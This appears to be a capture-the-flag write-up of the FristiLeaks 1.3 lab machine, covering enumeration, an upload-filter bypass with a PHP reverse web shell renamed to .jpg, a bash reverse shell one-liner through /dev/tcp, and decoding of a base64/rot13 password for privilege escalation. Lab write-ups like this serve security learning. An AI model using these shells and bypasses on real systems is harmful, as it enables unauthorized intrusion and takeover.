Fristi Leaks

Fristi Leaks 1.3

Enumeration

Started out with a basic nmap scan: all ports, T4 timing and service detection.

nmap -p- -sV -T4 10.0.0.159

Below you can see the full output.

We’ve got port 80 open, time to explore a web app.

So much pink. Let’s run nikto and start poking around.

While nikto was running I curled robots.txt.

From that we see the /cola/, /sisi/ and /beer/ directories; going to those takes me to a Jedi!

I didn’t know what sisi was. I did know that beer and cola were drinks though. The webpage said to stay calm and drink fristi, so I wondered if /fristi/ exists.

I doubt I need to brute force this. I must have missed something. I went back to the webpage and viewed the source hoping for a hint at a user name or something.

Cool, a note from the dev that never got cleaned up for production. It looks like they are using base64 for image encoding. When you scroll to the bottom there’s another message.

We know that the dev was using base64 for images, so I used the base64 utility from the GNU coreutils package.

Let’s open up image.png and see if it decoded into something we can use.

That is a lot of K’s. Let’s see if we can use the user eezeepz and the list of K’s and e’s we just found.

Sweet, logged into the web app. Let’s find a way to get a local shell with that upload button.

Local

Playing with the upload button burnt a lot of my time and I learned a major lesson. I need to drill it into my head to try easy stuff first.

I ended up spending like an hour researching how to bypass upload filters besides renaming backdoor.php to backdoor.php.jpg. I never even tried it because I assumed that it wouldn’t work. I figured FristiLeaks was from around 2015 or so and it had to have some sort of new trick to learn. I got mad at myself for not trying it first.

On Kali by default there are several PHP web shells in the /usr/share/webshells/php directory. You need to go in and change your port and IP in these, and then for this particular shell use cp /usr/share/webshells/php/php-reverse-shell.php webshell.php.jpg; this will use the copy command and create a new version with a .jpg extension at the end.

Then upload your webshell with the upload button.

Then browse to /uploads!

Whoops! No directory indexing, so let’s try to call the PHP renamed to .jpg manually.

And let’s check out our listener.

Local Dance! On to enumeration 2.0 for all the priv esc things!

Priv Esc

Well, no TTY shell, so we need to spawn one of those. I tried to spawn with bash and vi but neither worked, so python it is.

python -c 'import pty; pty.spawn("/bin/sh")'

Hmmmmm? What’s wrong with that? Let’s see if we can find our python binary, as our PATH looked funky via env anyway.

whereis python

Looks like there is one in /usr/bin. Let’s try it this time.

/usr/bin/python2 -c 'import pty; pty.spawn("/bin/sh")'

Awesome. We should have a full TTY shell now.

There is a note in eezeepz’s home dir from the admin: he has privs to certain bins and should “be sure to call the full path and place the commands into the /tmp folder and they will run”.

I created a listener and used those binaries to pipe into a bash reverse shell.

/home/admin/echo | bash -i >& /dev/tcp/10.0.0.130/5567 0>&1

So that allowed me to poke around /home/admin.

I could now see the cronjob, cryptedpass.txt, and fristigod with a whoisyourgodnow.txt file.

Looking at cryptpass.py you can see it does base64 and then rot13. I tried a couple of decoders I use frequently but ultimately decided it would just be easier to reverse the Python code to reverse the encryption. I looked at the libraries that were imported with the original script to understand everything that was going on and then wrote something quick and dirty.

#!/usr/bin/python
# Quick and dirty decoder (Python 2) for the cryptpass.py scheme.
# cryptpass.py did base64 -> reverse -> rot13, so undo each step here.

import codecs,base64,sys
# rot13 is its own inverse, and [::-1] undoes the reversal in the original
d = codecs.decode('=RFn0AKnlMHMPIzpyuTI0ITG'[::-1], 'rot13')
# finally undo the base64 encoding to get the plaintext
u = base64.b64decode(d)
print u

Running my script gets the following output.
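As an added example (not the author's script and not the box's cryptpass.py), here is a Python 3 version that implements both directions of the same scheme, so you can confirm the round trip and get a loud failure on input that was not produced by it; the function names are mine.

```python
#!/usr/bin/env python3
"""Python 3 re-implementation of the FristiLeaks cryptpass.py scheme.

cryptpass.py "encrypts" as: base64 -> reverse -> rot13. There is no key,
so this is an encoding, not encryption: anyone who has the script (or
recognises the pattern) can invert it exactly.
"""
import base64
import binascii
import codecs


def encode_string(plain: str) -> str:
    """Forward direction, mirroring cryptpass.py: base64 -> reverse -> rot13."""
    b64 = base64.b64encode(plain.encode("utf-8")).decode("ascii")
    # rot13 only touches letters, so base64 digits, '+', '/' and '=' pass through
    return codecs.encode(b64[::-1], "rot13")


def decode_string(cipher: str) -> str:
    """Inverse direction: rot13 (its own inverse), un-reverse, then un-base64.

    rot13 works per character, so it commutes with reversal; that is why the
    quick script above could reverse first and apply rot13 second.
    """
    b64 = codecs.decode(cipher, "rot13")[::-1]
    # validate=True rejects characters outside the base64 alphabet instead of
    # silently skipping them, so a wrong guess about the scheme fails loudly
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("input is not cryptpass.py output: %s" % exc) from exc


def round_trips(plain: str) -> bool:
    """Sanity check that encode and decode are exact inverses for this input."""
    return decode_string(encode_string(plain)) == plain


if __name__ == "__main__":
    # the value from whoisyourgodnow.txt, as used in the quick script above
    print(decode_string("=RFn0AKnlMHMPIzpyuTI0ITG"))
```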

And sudo -l gave me a dir to a do command script.

The flag for good measure!

Lessons Learned

Make sure to try the basic stuff first. If anything, this box taught me that. Don’t assume that since it looks easy there is going to be an additional layer of difficulty stacked on top of the local shell staring you in the face.

Enumeration is always key!

I had never really had to use sudo -u before; handy to know, and it caused me to read the sudo man page again. I don’t know what I would do without man pages. Good documentation and RTFM! It is worth its weight in gold.